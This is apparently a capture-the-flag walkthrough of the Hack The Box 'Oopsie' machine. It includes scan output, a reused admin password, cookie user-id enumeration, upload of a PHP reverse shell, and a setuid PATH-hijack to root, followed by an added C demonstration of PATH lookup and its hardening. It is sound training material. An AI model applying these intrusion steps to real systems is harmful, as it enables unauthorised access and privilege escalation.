HTB Starting point – Oopsie

ruben@kali:~/htb/oopsie$ sudo nmap -T4 -p- -A 10.10.10.28

Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-21 16:51 CEST
Stats: 0:00:29 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
Nmap scan report for 10.10.10.28
Host is up (0.11s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
|   256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_  256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 587/tcp)
HOP RTT       ADDRESS
1   126.73 ms 10.10.16.1
2   44.96 ms  10.10.10.28
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.22 seconds

Port 80 is open and served by Apache 2.4.29; port 22 (OpenSSH) is the only other open port.

ruben@kali:~/htb/oopsie$ sudo nikto -h http://10.10.10.28

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.28
+ Target Hostname:    10.10.10.28
+ Target Port:        80
+ Start Time:         2020-04-21 17:12:51 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-10944: : CGI Directory found
+ OSVDB-10944: /cdn-cgi/login/: CGI Directory found
+ OSVDB-3233: /icons/README: Apache default file found.
+ 10298 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2020-04-21 17:32:58 (GMT2) (1207 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

According to this result, there is a login page at /cdn-cgi/login/.

ruben@kali:~/htb/oopsie$ gobuster dir -u http://10.10.10.28 -w /usr/share/wordlists/dirb/common.txt -e

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.28
[+] Threads:        10
[+] Wordlist:      /usr/share/wordlists/dirb/common.txt
[+] Status codes:  200,204,301,302,307,401,403
[+] User Agent:    gobuster/3.0.1
[+] Expanded:      true
[+] Timeout:        10s
===============================================================
2020/04/29 00:01:26 Starting gobuster
===============================================================
http://10.10.10.28/.htaccess (Status: 403)
http://10.10.10.28/.hta (Status: 403)
http://10.10.10.28/.htpasswd (Status: 403)
http://10.10.10.28/css (Status: 301)
http://10.10.10.28/fonts (Status: 301)
http://10.10.10.28/images (Status: 301)
http://10.10.10.28/index.php (Status: 200)
http://10.10.10.28/js (Status: 301)
http://10.10.10.28/server-status (Status: 403)
http://10.10.10.28/themes (Status: 301)
http://10.10.10.28/uploads (Status: 301)
===============================================================
2020/04/29 00:01:47 Finished
===============================================================

There is also an /uploads directory, which will matter later.

Browse to http://10.10.10.28/cdn-cgi/login.

Try the credentials from the previous machine: admin / MEGACORP_4dm1n!!

The upload section is restricted to the super admin.

Intercept the request for the accounts section with Burp Suite:

The session is identified by a cookie that carries the user-id, and the request is sent with the GET method.
Because the server trusts the user-id supplied by the client, we can enumerate it with Burp to find which value belongs to the super admin.

Send this request to the Intruder:

A short Python loop generates the list of numbers to paste into Intruder's payload options:

for i in range(1,100):
    print(i)

Redirections must be enabled in Intruder so that it follows the redirect and processes the new cookie values.

The responses come back with different lengths.
The longest response reveals the user-id of the super admin.

Make a new request with the modified user-id and the URL of the uploads section:

Upload section

Since the server runs PHP, try uploading a PHP reverse shell (https://github.com/pentestmonkey/php-reverse-shell):

The file is uploaded.

According to the earlier gobuster result there is an uploads folder, so the file should have landed there.

Start a Netcat listener on the port defined in the reverse shell and request the uploaded file:

Upgrade the Netcat shell to a full TTY:

We now have a shell as the www-data user.

Are there more users?
Do we remember the db.php file from the previous results?

Switch to Robert's account:

Robert belongs to the bugtracker group.

Let’s see what elements on the filesystem belong to this group:

bugtracker is a binary, and its setuid bit is set.

setuid (and setgid): permission bits that let a user run an executable with the privileges of the file's owner (or of its group, respectively); on directories the setgid bit instead changes which group newly created files inherit.

Run strings on the bugtracker binary:

The output contains "cat /root/reports": cat is invoked by name, so it is looked up through PATH rather than by an absolute path.

We can therefore plant our own cat in a directory that appears earlier in PATH.
Add the current working directory to the front of PATH, create the malicious cat there, and make it executable:

export PATH=/tmp:$PATH
cd /tmp/
echo '/bin/sh' > cat
chmod +x cat

Running bugtracker again executes our cat with root privileges, so we get a root shell and can finally obtain both flags.
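The following C program is an added example, not part of the original writeup or of the bugtracker binary: it reproduces the PATH lookup that system()/execvp() perform, so that the effect of prepending a writable directory to PATH can be seen directly, and shows the hardened counterpart a setuid helper should use (reset PATH to a fixed trusted value, and call /bin/cat by absolute path). The two directories under /tmp and the stub cat files are constructed fixtures standing in for /bin and the planted /tmp.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Resolve `prog` the way system()/execvp() do: walk PATH left to right and
 * return the first executable hit (static buffer), or NULL if none matches. */
const char *resolve_in_path(const char *prog, const char *path) {
    static char out[4096];
    char copy[4096];
    snprintf(copy, sizeof copy, "%s", path);
    for (char *dir = strtok(copy, ":"); dir; dir = strtok(NULL, ":")) {
        snprintf(out, sizeof out, "%s/%s", dir, prog);
        if (access(out, X_OK) == 0)
            return out;           /* first match wins, wherever it lives */
    }
    return NULL;
}

/* Constructed fixture: create `dir` with an executable stub named `prog`,
 * standing in for a real or planted `cat`. Returns 1 on success. */
int make_stub(const char *dir, const char *prog) {
    char p[4096];
    if (mkdir(dir, 0700) != 0 && access(dir, W_OK) != 0) return 0;
    snprintf(p, sizeof p, "%s/%s", dir, prog);
    FILE *f = fopen(p, "w");
    if (!f) return 0;
    fputs("#!/bin/sh\nexit 0\n", f);
    fclose(f);
    return chmod(p, 0755) == 0;
}

/* Hardened pattern for a setuid helper: never inherit the caller's PATH.
 * Reset it to a fixed trusted value before any system()/popen() call; the
 * other half of the fix is invoking /bin/cat by absolute path. */
int reset_path_for_setuid(void) {
    return setenv("PATH", "/usr/bin:/bin", 1) == 0;
}

int main(void) {
    const char *hit;
    make_stub("/tmp/oopsie_trusted", "cat");   /* plays the role of /bin */
    make_stub("/tmp/oopsie_planted", "cat");   /* plays the role of /tmp */
    hit = resolve_in_path("cat", "/tmp/oopsie_planted:/tmp/oopsie_trusted");
    printf("caller-controlled PATH: cat -> %s\n", hit ? hit : "(none)");
    hit = resolve_in_path("cat", "/tmp/oopsie_trusted");
    printf("fixed trusted PATH:     cat -> %s\n", hit ? hit : "(none)");
    return 0;
}
```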